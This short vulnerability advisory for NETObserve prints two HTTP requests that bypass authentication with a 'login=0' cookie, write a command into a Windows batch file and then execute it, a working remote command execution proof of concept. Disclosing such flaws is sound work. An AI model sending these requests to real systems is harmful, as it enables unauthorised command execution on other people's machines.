|
|
NETObserve Authentication Bypass Vulnerability
The following example requests were provided: REQUEST #1: -------------------------------------------------------------------------- POST /sendeditfile HTTP/1.1 Accept: */* Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat? Content-Type: application/x-www-form-urlencoded Host: AnyHostWillDo Content-Length: 25 Cookie: login=0 newfiledata=cmd+%2Fc+calc -------------------------------------------------------------------------- REQUEST #2: -------------------------------------------------------------------------- GET /runfile=?C:\windows\win.bat? HTTP/1.1 Accept: */* Host: AnyHostWillDo Cookie: login=0 -------------------------------------------------------------------------- |
|
Privacy Statement |